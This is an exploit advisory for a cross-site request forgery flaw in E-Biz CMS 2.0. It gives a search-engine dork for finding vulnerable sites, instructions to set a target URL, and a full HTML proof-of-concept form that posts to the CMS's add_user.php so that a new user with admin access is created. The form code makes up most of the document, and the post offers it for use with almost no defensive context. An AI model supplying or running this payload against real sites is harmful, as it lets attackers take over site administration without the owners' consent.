E-Biz CMS 2.0 Cross Site Request Forgery

`====================================================================================================================================  
| # Title : E-Biz CMS v2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : https://softech.pk/ |   
| # Dork : Copyright © 2019, Designed By SOFTECH |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 17.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /add_user.php.  
  
[+] http://127.0.0.1/q7.3/softpanel/add_user.php.  
  
[+] save code as poc.html .  
  
<h1>Add User</h1>  
</div>  
<!-- #contentHeader -->  
<div class="site">  
<div class="container">  
<div class="grid-16">  
  
<div class="widget" >  
<div class="widget-header"> <span class="icon-wrench"></span>  
<h3>Add User </h3>  
</div>  
<!-- .widget-header -->  
<div class="widget-content">  
<!-- .field-group -->  
<!-- .field-group -->  
<!-- .field-group -->  
<form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
<table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
<tr>  
<td width="527" align="left"><strong>Name : </strong></td>  
</tr>  
<tr>  
<td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
</tr>  
<tr>  
<td><strong>Email :</strong> </td>  
</tr>  
<tr>  
<td><span class="field">  
<input name="email" type="text" id="date" class="validate[required,custom[email]" size="50" />  
</span></td>  
</tr>  
<tr>  
<td><strong>Password :</strong></td>  
</tr>  
<tr>  
<td><div class="field">  
<input name="password" type="text" id="date_English" class="validate[required]" size="50" />   
</div> </td>  
</tr>  
<tr>  
<td><strong>Access : </strong></td>  
</tr>  
<tr>  
<td><select name="type" id="type" >  
<option value="user" selected="selected">User</option>  
<option value="admin">Admin</option>  
</select> </td>  
</tr>  
<tr id="link">  
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td height="30"><strong id="">Privileges:</strong></td>  
</tr>  
<tr>  
<td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">  
  
<tr>  
<td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td height="25"><label for="label">Company News</label></td>  
<td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25">Home Banners</td>  
<td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
</tr> <tr>  
<td height="25">Gallery</td>  
<td><input type="checkbox" id="gal" name="gallery" value="Y" onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25"><label for="sim">Simple Gallery</label></td>  
<td><input type="checkbox" id="gallery" name="simple_gallery" value="Y" onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
</tr> <tr>  
<td height="25">Pages</td>  
<td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> <tr>  
<td height="25">Newsletter</td>  
<td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> <tr>  
<td height="25">Categories</td>  
<td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
</tr> </table> </td>  
</tr>  
  
</table> </td>  
</tr>  
</table></td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td></td>  
</tr>  
  
  
<tr>  
<td>&nbsp;</td>  
</tr>  
</table>  
</td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
</tr>  
<tr>  
<td></td>  
</tr>  
<tr>  
<td> </td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
</tr>  
<tr>  
<td><button name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>  
  
<button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
</tr>  
</table>  
</form>  
</div>  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================  
`